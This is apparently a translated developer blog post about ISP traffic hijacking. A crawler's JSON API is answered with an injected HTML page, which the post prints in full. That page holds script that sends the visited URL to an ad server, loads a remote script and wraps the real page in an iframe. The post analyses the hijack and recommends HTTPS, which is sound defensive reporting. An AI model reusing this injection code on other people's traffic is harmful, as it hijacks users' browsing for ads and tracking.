Operators hijacked the system and even changed Json

Operator hijacking is a common tactic used by thieves. They target people of all ages, even children. They often arrogantly pop up some embarrassing ads in the lower right corner or at the beginning or end of the web page. This makes it difficult for mothers who are tutoring their children to explain.

[[280817]]

1. Introduction

A classic interview question: What actually happens when you enter a URL and press Enter?

That depends on what URL you enter. Taobao will hurt your hands, Baidu will hurt your body, and Tencent will hurt your kidneys...

2. Mysterious Return

It was a sunny day with no clouds in the sky. The latency was reduced to less than 50ms. It was a good day for free-range crawlers.

As usual, with a few quick operations, the data was successfully stored in the database like a hundred rivers flowing into the sea. Just when I wanted to make a cup of coffee and look at the long-lost sky, a long error message splashed onto the screen like diarrhea!

Grass (a kind of plant), has it been discovered? Check it out quickly

Grass! (a powerful plant). What is this? I thought it would return an abnormal status code, or an error json, or at least fake data, but I didn't expect that even the data format was changed, and a whole HTML was thrown at me?

But this interface is clearly all json.

I drank some water to calm myself down but ended up burning my mouth... After thinking it over, the product can't meet this demand if it only drinks alcohol without eating food. Besides, I'm a small mosquito, so I won't use a cannon to attack.

There must be! — Question! — Question!

I quickly checked the logs and found the frequency. There was an exception in about 10 requests, so I got all the HTML codes. Let's learn...

 <html>
 <head>
    <meta http-equiv= "Content-Type" content= "text/html; charset=utf-8" />
 <meta id= "viewport"   name = "viewport" content= "width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" >
 </head>
 <script>
    window[ "$$$wins_pm" ] = {
 "a" : "https://atplay.cn/banner/indexsd.aspx" ,
 "m" : "http://baidu.com/" ,
 "_xus" : "YBsOw1mgMPSOdBFpMBFjYBQjMZSjMBsXM3gO" ,
 "_xai" : "0"  
 }; 
 
    var xp= null , key = "d=123" ,lo=location.href,ho= false ;
 function cu(u){
        var p=u.indexOf( "?" );
 if(p>0)
            u=u.slice(0,p+1)+ key + "&" +u.slice(p+1);
 else  
 u+= "?" + key ;
 return u; 
 
 } 
 
 function Base64() {
        _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" ;
        this.encode = function (input) {
 var output = "" ;
            var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
 var i = 0;
            input = _utf8_encode(input);
            while (i < input.length) {
                chr1 = input.charCodeAt(i++);
                chr2 = input.charCodeAt(i++);
                chr3 = input.charCodeAt(i++);
                enc1 = chr1 >> 2;
                enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
                enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
                enc4 = chr3 & 63;
                if (isNaN(chr2)) {
                    enc3 = enc4 = 64
                } else if (isNaN(chr3)) {
 enc4 = 64
 }
 output = output + _keyStr.charAt(enc1) + _keyStr.charAt(enc2) + _keyStr.charAt(enc3) + _keyStr.charAt(enc4)
 }
 return   output  
 };
        this.decode = function (input) {
 var output = "" ;
            var chr1, chr2, chr3;
            var enc1, enc2, enc3, enc4;
 var i = 0;
            input = input. replace (/[^A-Za-z0-9\+\/\=]/g, "" );
            while (i < input.length) {
                enc1 = _keyStr.indexOf(input.charAt(i++));
                enc2 = _keyStr.indexOf(input.charAt(i++));
                enc3 = _keyStr.indexOf(input.charAt(i++));
                enc4 = _keyStr.indexOf(input.charAt(i++));
                chr1 = (enc1 << 2) | (enc2 >> 4);
                chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
                chr3 = ((enc3 & 3) << 6) | enc4;
 output = output + String.fromCharCode(chr1);
                if (enc3 != 64) {
 output = output + String.fromCharCode(chr2)
 }
                if (enc4 != 64) {
 output = output + String.fromCharCode(chr3)
 }
 }
 output = _utf8_decode( output );
 return   output  
 };
        _utf8_encode = function (string) {
            string = string.replace (/\r\n/g, "\n" );
            var utftext = "" ;
 for (var n = 0; n < string.length; n++) {
                var c = string.charCodeAt(n);
                if (c < 128) {
                    utftext += String.fromCharCode(c)
                } else if ((c > 127) && (c < 2048)) {
                    utftext += String.fromCharCode((c >> 6) | 192);
                    utftext += String.fromCharCode((c & 63) | 128)
 } else {
                    utftext += String.fromCharCode((c >> 12) | 224);
                    utftext += String.fromCharCode(((c >> 6) & 63) | 128);
                    utftext += String.fromCharCode((c & 63) | 128)
 }
 }
 return utftext
 };
        _utf8_decode = function (utftext) {
 var string = "" ;
 var i = 0;
            var c = c1 = c2 = 0;
            while (i < utftext.length) {
                c = utftext.charCodeAt(i);
                if (c < 128) {
                    string += String.fromCharCode(c);
 i++
                } else if ((c > 191) && (c < 224)) {
                    c2 = utftext.charCodeAt(i + 1);
                    string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
 i += 2
 } else {
                    c2 = utftext.charCodeAt(i + 1);
                    c3 = utftext.charCodeAt(i + 2);
                    string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
 i += 3
 }
 }
 return string
 }
 }
    window[ "__BASE64" ] = new Base64(); 
 
 function getURLwithParams() {
 var url = "" ;
        if ($$$wins_pm.a.indexOf( '?' ) > 0) {
            url = $$$wins_pm.a + "&_us=" + $$$wins_pm._xus + "&_su=" + __BASE64.encode($$$wins_pm.m) + "&_id=" + $$$wins_pm._xai;
 } else {
            url = $$$wins_pm.a + "?_us=" + $$$wins_pm._xus + "&_su=" + __BASE64.encode($$$wins_pm.m) + "&_id=" + $$$wins_pm._xai;
 }
 return url;
 }
 function goURLm() {
        var desturl = $$$wins_pm.m;
        if (desturl.slice(desturl.length - 1) == "/" ) desturl = desturl.slice(0, desturl.length - 1);
 return   "<html></head><script>document.location.replace(\"" + desturl + "\");<\/script><\/html>"  
 };
 </script>
  <body style= "margin:0;padding:0;" >
    <! --<div style="display: none;"><script src="https://s6.cnzz.com/z_stat.php?id=722749&web_id=722749" language="JavaScript"></script></div>-->  
    <script type= "text/javascript" src= "https://atplay.cn/banner/indexsd.js" ></script>
    <div style= "width:100%;height:100%;-webkit-overflow-scrolling:touch;overflow-y:scroll;" >
    <iframe id= 'ifrmain' src= 'JavaScript:parent.goURLm()' scrolling=auto width= '100%' height= '100%' frameborder= 'no' onload= '' ></iframe>
 </div>
 </body>
 </html>

3. The truth is revealed

Damn! The truth is out. This lousy code is definitely not suitable for crawlers. It is not even as good as gutter oil! It is probably the work of broadband operators. Before, every visit to Baidu was set up with an iframe. But I never expected that this time, they were so desperate that they even took care of the JSON interface and made such a big, rough and hard modification!

This is like when you just leave the airport and want to take a taxi to the tourist attraction, but you end up getting a black car, which pulls up a big sword for eating and sauna, and you empty your wallet and slap it on the ground!

Since it is confirmed to be a black car, I will just call this silly fish. Let's see the effect first——

Haha, haha, haha... As expected.

I endured the discomfort and flipped through the code, found the domain name, and ran a whois

Get the company name, and search Baidu, Tianyancha, and Qichacha... It's this, it's this

4. The result?

This method is usually impossible to accomplish without the collusion of broadband operators. At present, my home has one X letter and one X mobile line. After repeated testing, only the X mobile line will have this problem. . . Then the matter is very simple

Complain to the Ministry of Industry and Information Technology!

Coordinates: https://dxss.miit.gov.cn/

The storm is over and the sky is clear again, but this - I'm afraid it will never be the last time.

5. What should I do with my website?

It's understandable that you do some hijacking, after all, the soil is like this. But the hijacking bot you wrote is too stupid, it even messes up the JSON format, how can the company run it? You know, many services now don't have web terminals, and the hijacking program should be upgraded.

Once upon a time, our websites were all http, which is the favorite of hijackers. The way to deal with it is to upgrade to https in an all-round way, making it more difficult to hijack, protecting users and yourself.

About the author: Xiaojieweidao (xjjdog), a public account that does not allow programmers to take detours. Focusing on infrastructure and Linux. Ten years of architecture, hundreds of billions of daily traffic, discussing the high-concurrency world with you, giving you a different taste. My personal WeChat is xjjdog0, welcome to add friends for further communication.